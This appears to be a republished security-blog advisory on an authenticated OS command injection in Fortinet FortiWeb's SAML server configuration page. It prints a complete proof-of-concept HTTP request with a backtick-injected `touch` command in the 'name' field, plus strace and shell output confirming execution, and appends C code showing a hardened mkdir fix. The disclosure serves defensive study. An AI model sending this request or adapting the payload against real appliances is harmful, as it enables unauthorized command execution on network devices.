0day Fortinet FortiWeb OS Command Injection
2021-08-22 10:59:34 Author: mp.weixin.qq.com

Source: Khan安全攻防实验室

An OS command injection vulnerability in the FortiWeb management interface (version 6.3.11 and earlier) allows a remote, authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.

POC:

POST /api/v2.0/user/remoteserver.saml HTTP/1.1
Host: [redacted]
Cookie: [redacted]
User-Agent: [redacted]
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/root/user/remote-user/saml-user/
X-Csrftoken: 814940160
Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412
Content-Length: 3068
Origin: https://[redacted]
Dnt: 1
Te: trailers
Connection: close

-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="q_type"

1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="name"

`touch /tmp/vulnerable`
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="entityID"

test
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="service-path"

/saml.sso
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-lifetime"

8
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-timeout"

30
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind"

post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind_val"

1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-path"

/SAML2/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind"

post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind_val"

1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-path"

/SLO/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="flag"

0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing"

disable
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing_val"

0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="metafile"; filename="test.xml"
Content-Type: text/xml

<?xml version="1.0"?><md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2021-06-12T16:54:31Z" cacheDuration="PT1623948871S" entityID="test"><md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"><md:KeyDescriptor use="signing"><ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:X509Data><ds:X509Certificate>test</ds:X509Certificate></ds:X509Data></ds:KeyInfo></md:KeyDescriptor><md:KeyDescriptor use="encryption"><ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:X509Data><ds:X509Certificate>test</ds:X509Certificate></ds:X509Data></ds:KeyInfo></md:KeyDescriptor><md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat><md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="test"/></md:IDPSSODescriptor></md:EntityDescriptor>
-----------------------------94351131111899571381631694412--

HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Jun 2021 11:59:45 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: [redacted]
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: frame-ancestors 'self'
X-Content-Type-Options: nosniff
Content-Length: 20
Strict-Transport-Security: max-age=63072000
Connection: close
Content-Type: application/json

{"errcode": "-651"}

The "touch" command is spliced into the mkdir shell command:

[pid 12867] execve("/migadmin/cgi-bin/fwbcgi", ["/migadmin/cgi-bin/fwbcgi"], 0x55bb0395bf00 /* 42 vars */) = 0
[pid 13934] execve("/bin/sh", ["sh", "-c", "mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`"], 0x7fff56b1c608 /* 42 vars */) = 0
[pid 13935] execve("/bin/touch", ["touch", "/tmp/vulnerable"], 0x55774aa30bf8 /* 44 vars */) = 0
[pid 13936] execve("/bin/mkdir", ["mkdir", "/data/etc/saml/shibboleth/service_providers/"], 0x55774aa30be8 /* 44 vars */) = 0

The result of the "touch" command, seen on the FortiWeb appliance's local command line:

/# ls -l /tmp/vulnerable
-rw-r--r--    1 root     0                0 Jun 10 11:59 /tmp/vulnerable
/#
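As an added example, not code from the original article or from Fortinet, the C below contrasts the pattern visible in the strace output (a user-controlled SAML server name spliced into `sh -c "mkdir <base><name>"`, so the shell interprets backticks) with a hardened version that validates the name against an allowlist and calls mkdir(2) directly, so no shell is involved. The allowlist, the 63-character limit and the helper names are assumptions for illustration, not Fortinet's actual fix.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <sys/stat.h>

/* Vulnerable pattern (as seen in the strace above), shown for contrast only:
 *   snprintf(cmd, sizeof cmd, "mkdir %s%s", base, name); system(cmd);
 * Because the string goes through /bin/sh, backticks, $( ), ';' and '|'
 * inside "name" are executed as commands before mkdir ever runs. */

/* Assumed allowlist: a SAML server config name only needs [A-Za-z0-9._-],
 * must not start with '.', and is capped at 63 characters.             */
int is_safe_saml_name(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 63 || name[0] == '.') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '-' || c == '_' || c == '.')) return 0;
    }
    return 1;
}

/* Build "<base><name>" into out; returns 0 on success, -1 when the name is
 * rejected or the result would not fit (truncation is treated as an error). */
int build_sp_path(char *out, size_t outsz, const char *base, const char *name) {
    if (!is_safe_saml_name(name)) return -1;
    int len = snprintf(out, outsz, "%s%s", base, name);
    if (len < 0 || (size_t)len >= outsz) return -1;
    return 0;
}

/* Hardened version: create the directory with the mkdir(2) syscall. No shell
 * parses the path, so there is nothing for an injected command to run in.  */
int create_sp_dir(const char *base, const char *name) {
    char path[512];
    if (build_sp_path(path, sizeof path, base, name) != 0) return -1;
    if (mkdir(path, 0750) != 0 && errno != EEXIST) return -1;
    return 0;
}
```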



Source: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650520820&idx=2&sn=c13ee4de2f24c8c3ee4bc8d7a2aa461c&chksm=83bad910b4cd50067b5419666bfef0316ec999ab91d21df48a9ff4e7d30ba3405c89980d8b51#rd